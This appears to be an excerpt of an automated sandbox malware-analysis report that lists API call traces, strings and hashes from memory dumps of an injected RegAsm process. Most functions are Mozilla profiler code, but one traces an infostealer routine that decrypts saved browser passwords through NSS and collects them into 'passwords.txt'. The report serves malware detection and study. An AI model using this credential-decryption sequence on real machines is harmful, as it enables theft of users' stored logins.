strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,mainthreadio,?,?,?,?,?,?,?,?,?,6C52582D), ref: 6C55CC82
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileio,?,?,?,?,?,?,?,?,?,?,?,6C52582D), ref: 6C55CC98
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,fileioall,?,?,?,?,?,?,?,?,?,?,?,?,?,6C52582D), ref: 6C55CCAE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,noiostacks), ref: 6C55CCC4
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,screenshots), ref: 6C55CCDA
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,seqstyle), ref: 6C55CCEC
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,stackwalk), ref: 6C55CCFE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,jsallocations), ref: 6C55CD14
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nostacksampling), ref: 6C55CD82
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,preferencereads), ref: 6C55CD98
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,nativeallocations), ref: 6C55CDAE
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,ipcmessages), ref: 6C55CDC4
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,audiocallbacktracing), ref: 6C55CDDA
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpu), ref: 6C55CDF0
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,notimerresolutionchange), ref: 6C55CE06
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,cpuallthreads), ref: 6C55CE1C
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,samplingallthreads), ref: 6C55CE32
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,markersallthreads), ref: 6C55CE48
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,unregisteredthreads), ref: 6C55CE5E
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,processcpu), ref: 6C55CE74
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,power), ref: 6C55CE8A

Strings

seqstyle, xrefs: 6C55CCE6
jsallocations, xrefs: 6C55CD0E
processcpu, xrefs: 6C55CE6E
unregisteredthreads, xrefs: 6C55CE58
stackwalk, xrefs: 6C55CCF8
leaf, xrefs: 6C55CC66
java, xrefs: 6C55CC37
default, xrefs: 6C55CC21
fileioall, xrefs: 6C55CCA8
noiostacks, xrefs: 6C55CCBE
notimerresolutionchange, xrefs: 6C55CE00
audiocallbacktracing, xrefs: 6C55CDD4
screenshots, xrefs: 6C55CCD4
samplingallthreads, xrefs: 6C55CE2C
nativeallocations, xrefs: 6C55CDA8
preferencereads, xrefs: 6C55CD92
cpuallthreads, xrefs: 6C55CE16
Unrecognized feature "%s"., xrefs: 6C55CEA0
fileio, xrefs: 6C55CC92
ipcmessages, xrefs: 6C55CDBE
power, xrefs: 6C55CE84
nostacksampling, xrefs: 6C55CD7C
mainthreadio, xrefs: 6C55CC7C
markersallthreads, xrefs: 6C55CE42

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: strcmp
String ID: Unrecognized feature "%s".$audiocallbacktracing$cpuallthreads$default$fileio$fileioall$ipcmessages$java$jsallocations$leaf$mainthreadio$markersallthreads$nativeallocations$noiostacks$nostacksampling$notimerresolutionchange$power$preferencereads$processcpu$samplingallthreads$screenshots$seqstyle$stackwalk$unregisteredthreads
API String ID: 1004003707-2809817890
Opcode ID: 14569d9f4356a89851d9d11d5aeafaebec0419006d48738cbc32bb496c2bd520
Instruction ID: 199ec7a9c5d365c10ce24ab127afef61108bf50ad6cb480f9462001239660ef8
Opcode Fuzzy Hash: 14569d9f4356a89851d9d11d5aeafaebec0419006d48738cbc32bb496c2bd520
Instruction Fuzzy Hash: E2519AF1A0737551FA0170656D10BAA1448EF9F34AF904937DE07E1E80FF09BA2A86B7

Function 0040A916 Relevance: 63.2, APIs: 34, Strings: 2, Instructions: 211stringmemoryfileCOMMON

Download Yara Rule

APIs

NSS_Init.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040A922

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,004373A4,0043680F), ref: 0040A9C1
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040A9D9
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040A9E1
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040A9ED
??_U@YAPAXI@Z.MSVCRT(00000001,?,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040A9F7
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA09
GetProcessHeap.KERNEL32(00000000,000F423F,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA15
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA1C
StrStrA.SHLWAPI(0040B824,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA2D
StrStrA.SHLWAPI(-00000010,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA47
lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA5A
lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA64
lstrcatA.KERNEL32(00000000,004373A8,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA70
lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA7A
lstrcatA.KERNEL32(00000000,004373AC,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA86
lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA93
lstrcatA.KERNEL32(00000000,-00000010,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AA9B
lstrcatA.KERNEL32(00000000,004373B0,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AAA7
StrStrA.SHLWAPI(-000000FE,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AAB7
StrStrA.SHLWAPI(00000014,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AAC7
lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AADA

Part of subcall function 0040A7D8: _memset.LIBCMT ref: 0040A815
Part of subcall function 0040A7D8: lstrlenA.KERNEL32(?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0040AAE7), ref: 0040A830
Part of subcall function 0040A7D8: CryptStringToBinaryA.CRYPT32(?,00000000,?,00000001,?,?,00000000), ref: 0040A838
Part of subcall function 0040A7D8: PK11_GetInternalKeySlot.NSS3(?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0040AAE7), ref: 0040A846
Part of subcall function 0040A7D8: PK11_Authenticate.NSS3(00000000,00000001,00000000,?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0040AAE7), ref: 0040A85A
Part of subcall function 0040A7D8: PK11SDR_Decrypt.NSS3(?,?,00000000,?,00000000,00000000,00000000,00000000,00000014,?,0040AAE7), ref: 0040A89A
Part of subcall function 0040A7D8: _memmove.LIBCMT ref: 0040A8BB
Part of subcall function 0040A7D8: PK11_FreeSlot.NSS3(00000000,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040A8EC

lstrcatA.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AAE9
lstrcatA.KERNEL32(00000000,004373B4,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AAF5
StrStrA.SHLWAPI(-000000FE,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AB05
StrStrA.SHLWAPI(00000014,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AB15
lstrcatA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AB28

Part of subcall function 0040A7D8: lstrcatA.KERNEL32(00436803,00436807,?,00000000,00000000,00000000,00000000,00000014,?,0040AAE7), ref: 0040A8E5
Part of subcall function 0040A7D8: lstrcatA.KERNEL32(00436803,0043680E,?,00000000,?,00000001,?,?,00000000,00000000,00000000,00000000,00000014,?,0040AAE7), ref: 0040A8FB

lstrcatA.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AB37
lstrcatA.KERNEL32(00000000,004373B8,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AB43
lstrcatA.KERNEL32(00000000,004373BC,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AB4F
StrStrA.SHLWAPI(-000000FE,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040AB5F
lstrlenA.KERNEL32(00000000), ref: 0040AB7D
CloseHandle.KERNEL32(?), ref: 0040ABAC
NSS_Shutdown.NSS3(?,?,?,?,?,?,?,?,?,?,0040B824), ref: 0040ABB2

Strings

passwords.txt, xrefs: 0040AB89
pe, xrefs: 0040A931

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$File$lstrcpy$K11_lstrlen$HeapPointerSlot$AllocAuthenticateBinaryCloseCreateCryptDecryptFreeHandleInitInternalProcessReadShutdownSizeString_memmove_memset
String ID: passwords.txt$pe
API String ID: 2725232238-1761351166
Opcode ID: 6515523e2a9acb22778a198fb2e3cfaa62e68f67476996d2fc7beb9edd0c2087
Instruction ID: 1a907496ddc9cbec6b75df531e31c39fb9952b717cdae40389231e62c8e49acd
Opcode Fuzzy Hash: 6515523e2a9acb22778a198fb2e3cfaa62e68f67476996d2fc7beb9edd0c2087
Instruction Fuzzy Hash: DF71A331500215ABCF15EFA1DD4DD9E3BBAEF4830AF101015F901A31A1EB7A5A55CBA6

Function 6C5247C0 Relevance: 49.2, APIs: 23, Strings: 5, Instructions: 232threadCOMMON

Download Yara Rule

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING), ref: 6C524801
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C524817
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C52482D
__Init_thread_footer.LIBCMT ref: 6C52484A

Part of subcall function 6C54AB3F: EnterCriticalSection.KERNEL32(6C59E370,?,?,6C513527,6C59F6CC,?,?,?,?,?,?,?,?,6C513284), ref: 6C54AB49
Part of subcall function 6C54AB3F: LeaveCriticalSection.KERNEL32(6C59E370,?,6C513527,6C59F6CC,?,?,?,?,?,?,?,?,6C513284,?,?,6C5356F6), ref: 6C54AB7C

GetCurrentThreadId.KERNEL32 ref: 6C52485F
GetCurrentThreadId.KERNEL32 ref: 6C52487E
AcquireSRWLockExclusive.KERNEL32(6C59F4B8), ref: 6C52488B
free.MOZGLUE(?), ref: 6C52493A
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C524956
free.MOZGLUE(00000000), ref: 6C524960
ReleaseSRWLockExclusive.KERNEL32(6C59F4B8), ref: 6C52499A

Part of subcall function 6C54AB89: EnterCriticalSection.KERNEL32(6C59E370,?,?,?,6C5134DE,6C59F6CC,?,?,?,?,?,?,?,6C513284), ref: 6C54AB94
Part of subcall function 6C54AB89: LeaveCriticalSection.KERNEL32(6C59E370,?,6C5134DE,6C59F6CC,?,?,?,?,?,?,?,6C513284,?,?,6C5356F6), ref: 6C54ABD1

free.MOZGLUE(?), ref: 6C5249C6
free.MOZGLUE(?), ref: 6C5249E9

Part of subcall function 6C535E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C535EDB
Part of subcall function 6C535E90: memset.VCRUNTIME140(ewWl,000000E5,?), ref: 6C535F27
Part of subcall function 6C535E90: LeaveCriticalSection.KERNEL32(?), ref: 6C535FB2

Strings

MOZ_PROFILER_SHUTDOWN, xrefs: 6C524A42
MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C5247FC
MOZ_BASE_PROFILER_LOGGING, xrefs: 6C524828
[I %d/%d] profiler_shutdown, xrefs: 6C524A06
MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C524812

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: CriticalSection$free$EnterLeavegetenv$CurrentExclusiveLockThread$AcquireInit_thread_footerReleasememset
String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING$MOZ_PROFILER_SHUTDOWN$[I %d/%d] profiler_shutdown
API String ID: 1340022502-4194431170
Opcode ID: b333fb020a7085658ec2c2797470340656b6c32c77156b02919af022c7213bab
Instruction ID: 9ba9332de5956e12f8981501dc071f0ceed7c3e18a9356a050f777adeff0df16
Opcode Fuzzy Hash: b333fb020a7085658ec2c2797470340656b6c32c77156b02919af022c7213bab
Instruction Fuzzy Hash: CC81D371A00190CBDB10DF28CC4475A37F6FF82318F5606A9E91A97BC1E739E954CB9A

Function 6C524470 Relevance: 45.7, APIs: 20, Strings: 6, Instructions: 178libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6C524730: GetModuleHandleW.KERNEL32(00000000,?,?,?,?,6C5244B2,6C59E21C,6C59F7F8), ref: 6C52473E
Part of subcall function 6C524730: GetProcAddress.KERNEL32(00000000,GetNtLoaderAPI), ref: 6C52474A

GetModuleHandleW.KERNEL32(WRusr.dll), ref: 6C5244BA
LoadLibraryW.KERNEL32(kernel32.dll), ref: 6C5244D2
InitOnceExecuteOnce.KERNEL32(6C59F80C,6C51F240,?,?), ref: 6C52451A
GetModuleHandleW.KERNEL32(user32.dll), ref: 6C52455C
LoadLibraryW.KERNEL32(?), ref: 6C524592
InitializeCriticalSection.KERNEL32(6C59F770), ref: 6C5245A2
moz_xmalloc.MOZGLUE(00000008), ref: 6C5245AA
moz_xmalloc.MOZGLUE(00000018), ref: 6C5245BB
InitOnceExecuteOnce.KERNEL32(6C59F818,6C51F240,?,?), ref: 6C524612
?IsWin32kLockedDown@mozilla@@YA_NXZ.MOZGLUE ref: 6C524636
LoadLibraryW.KERNEL32(user32.dll), ref: 6C524644
memset.VCRUNTIME140(?,00000000,00000114), ref: 6C52466D
VerSetConditionMask.NTDLL ref: 6C52469F
VerSetConditionMask.NTDLL ref: 6C5246AB
VerSetConditionMask.NTDLL ref: 6C5246B2
VerSetConditionMask.NTDLL ref: 6C5246B9
VerSetConditionMask.NTDLL ref: 6C5246C0
VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C5246CD
GetModuleHandleW.KERNEL32(00000000), ref: 6C5246F1
GetProcAddress.KERNEL32(00000000,NativeNtBlockSet_Write), ref: 6C5246FD

Strings

NativeNtBlockSet_Write, xrefs: 6C5246F7
l, xrefs: 6C524578
kernel32.dll, xrefs: 6C5244CD
user32.dll, xrefs: 6C524557, 6C52463F
GYl, xrefs: 6C5244FC
WRusr.dll, xrefs: 6C5244B5

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: ConditionMask$HandleModuleOnce$LibraryLoad$AddressExecuteInitProcmoz_xmalloc$CriticalDown@mozilla@@InfoInitializeLockedSectionVerifyVersionWin32kmemset
String ID: GYl$NativeNtBlockSet_Write$WRusr.dll$kernel32.dll$l$user32.dll
API String ID: 1702738223-281007556
Opcode ID: 350a316b3aaed2936b8da1ce7cec47cacb136703c73935910bfbc0761d408b00
Instruction ID: ed26ca32a29de0877759e11616d642dbf8f092830965ee72b3a3adb14d770121
Opcode Fuzzy Hash: 350a316b3aaed2936b8da1ce7cec47cacb136703c73935910bfbc0761d408b00
Instruction Fuzzy Hash: EA6128B0A003C4AFFB109F60CC09B957BF8EB46308F1686D8F5459B681D7B89945CF91

Function 6C5219A0 Relevance: 44.2, APIs: 24, Strings: 1, Instructions: 407COMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(6C59F760), ref: 6C5219BD
GetCurrentProcess.KERNEL32 ref: 6C5219E5
GetLastError.KERNEL32 ref: 6C521A27
moz_xmalloc.MOZGLUE(?), ref: 6C521A41
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C521A4F
GetLastError.KERNEL32 ref: 6C521A92
moz_xmalloc.MOZGLUE(?), ref: 6C521AAC
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C521ABA
LocalFree.KERNEL32(?), ref: 6C521C69
free.MOZGLUE(?), ref: 6C521C8F
free.MOZGLUE(?), ref: 6C521C9D
CloseHandle.KERNEL32(?), ref: 6C521CAE
ReleaseSRWLockExclusive.KERNEL32(6C59F760), ref: 6C521D52
GetLastError.KERNEL32 ref: 6C521DA5
GetLastError.KERNEL32 ref: 6C521DFB
GetLastError.KERNEL32 ref: 6C521E49
GetLastError.KERNEL32 ref: 6C521E68
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C521E9B

Part of subcall function 6C522070: LoadLibraryW.KERNEL32(combase.dll,6C521C5F), ref: 6C5220AE
Part of subcall function 6C522070: GetProcAddress.KERNEL32(00000000,CoInitializeSecurity), ref: 6C5220CD
Part of subcall function 6C522070: __Init_thread_footer.LIBCMT ref: 6C5220E1

memset.VCRUNTIME140(?,00000000,00000110), ref: 6C521F15
VerSetConditionMask.NTDLL ref: 6C521F46
VerSetConditionMask.NTDLL ref: 6C521F52
VerSetConditionMask.NTDLL ref: 6C521F59
VerSetConditionMask.NTDLL ref: 6C521F60
VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C521F6D

Strings

D, xrefs: 6C521B57

Memory Dump Source

Source File: 00000003.00000002.2979431976.000000006C511000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C510000, based on PE: true

Associated: 00000003.00000002.2979380892.000000006C510000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981509228.000000006C58D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981761142.000000006C59E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000003.00000002.2981881945.000000006C5A2000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6c510000_RegAsm.jbxd

Similarity

API ID: ErrorLast$ConditionMask$freememset$ExclusiveLockmoz_xmalloc$AcquireAddressCloseCurrentFreeHandleInfoInit_thread_footerLibraryLoadLocalProcProcessReleaseVerifyVersion
String ID: D
API String ID: 290179723-2746444292
Opcode ID: 2e19e943f37f197b84a21c4730f7dc312e217c136240448ac993752605600951
Instruction ID: 4acf4d1ddb9df0c0e2d4fd400b7c898d41f5de34362905545fa5a9bcd217ea6b
Opcode Fuzzy Hash: 2e19e943f37f197b84a21c4730f7dc312e217c136240448ac993752605600951
Instruction Fuzzy Hash: 0EF1A171A00365ABEB209F65CC48B9BB7F8FF49304F124199E905A7680E779ED80CF94

Function 00424B17 Relevance: 42.1, APIs: 19, Strings: 5, Instructions: 109libraryloadermemoryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL), ref: 00424B1F
__mtterm.LIBCMT ref: 00424B2B

Part of subcall function 004247EA: DecodePointer.KERNEL32(FFFFFFFF), ref: 004247FB
Part of subcall function 004247EA: TlsFree.KERNEL32(FFFFFFFF), ref: 00424815

GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00424B41
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00424B4E
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00424B5B
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00424B68
TlsAlloc.KERNEL32 ref: 00424BB8
TlsSetValue.KERNEL32(00000000), ref: 00424BD3
__init_pointers.LIBCMT ref: 00424BDD
EncodePointer.KERNEL32 ref: 00424BEE
EncodePointer.KERNEL32 ref: 00424BFB
EncodePointer.KERNEL32 ref: 00424C08
EncodePointer.KERNEL32 ref: 00424C15
DecodePointer.KERNEL32(Function_0002496E), ref: 00424C36
__calloc_crt.LIBCMT ref: 00424C4B
DecodePointer.KERNEL32(00000000), ref: 00424C65
__initptd.LIBCMT ref: 00424C70
GetCurrentThreadId.KERNEL32 ref: 00424C77

Strings

FlsFree, xrefs: 00424B5D
FlsGetValue, xrefs: 00424B43
KERNEL32.DLL, xrefs: 00424B1A
FlsSetValue, xrefs: 00424B50
FlsAlloc, xrefs: 00424B3B

Memory Dump Source

Source File: 00000003.00000002.2832771342.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2832771342.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2832771342.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Pointer$AddressEncodeProc$Decode$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__initptd__mtterm
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
API String ID: 3732613303-3819984048
Opcode ID: c3e8602a75dcfac61e5a676cfef74acbdb1683745e949ee774a63f93a96c250c
Instruction ID: 9e7d6304cc20a0816a56486267aa260185140d132a286571763312e702071250
Opcode Fuzzy Hash: c3e8602a75dcfac61e5a676cfef74acbdb1683745e949ee774a63f93a96c250c
Instruction Fuzzy Hash: F7312C35E053609ADB23AF7ABD0860A3BA4EF85722B51063BE410D32B1DBB9D440DF5D

Function 6C55E8B0 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 297threadsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 6C557090: ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,00000000,?,6C55B9F1,?), ref: 6C557107

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C55DCF5), ref: 6C55E92D
GetCurrentThreadId.KERNEL32 ref: 6C55EA4F
AcquireSRWLockExclusive.KERNEL32(6C59F4B8), ref: 6C55EA5C
ReleaseSRWLockExclusive.KERNEL32(6C59F4B8), ref: 6C55EA80
GetCurrentThreadId.KERNEL32 ref: 6C55EA8A
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,6C55DCF5), ref: 6C55EA92
GetCurrentThreadId.KERNEL32 ref: 6C55EB11
AcquireSRWLockExclusive.KERNEL32(6C59F4B8), ref: 6C55EB1E
memset.VCRUNTIME140(?,00000000,000000E0), ref: 6C55EB3C
ReleaseSRWLockExclusive.KERNEL32(6C59F4B8), ref: 6C55EB5B

Part of subcall function 6C555710: ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C55EB71), ref: 6C5557AB

Part of subcall function 6C54CBE8: GetCurrentProcess.KERNEL32(?,6C5131A7), ref: 6C54CBF1
Part of subcall function 6C54CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C5131A7), ref: 6C54CBFA

Part of subcall function 6C559420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C524A68), ref: 6C55945E
Part of subcall function 6C559420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C559470
Part of subcall function 6C559420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C559482
Part of subcall function 6C559420: __Init_thread_footer.LIBCMT ref: 6C55949F

GetCurrentThreadId.KERNEL32 ref: 6C55EBA4
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000), ref: 6C55EBAC

Part of subcall function 6C5594D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C5594EE
Part of subcall function 6C5594D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C559508

GetCurrentThreadId.KERNEL32 ref: 6C55EBC1
AcquireSRWLockExclusive.KERNEL32(6C59F4B8,?,?,00000000), ref: 6C55EBCE
?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000,?,?,00000000), ref: 6C55EBE5
ReleaseSRWLockExclusive.KERNEL32(6C59F4B8,00000000), ref: 6C55EC37
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C55EC46
CloseHandle.KERNEL32(?), ref: 6C55EC55
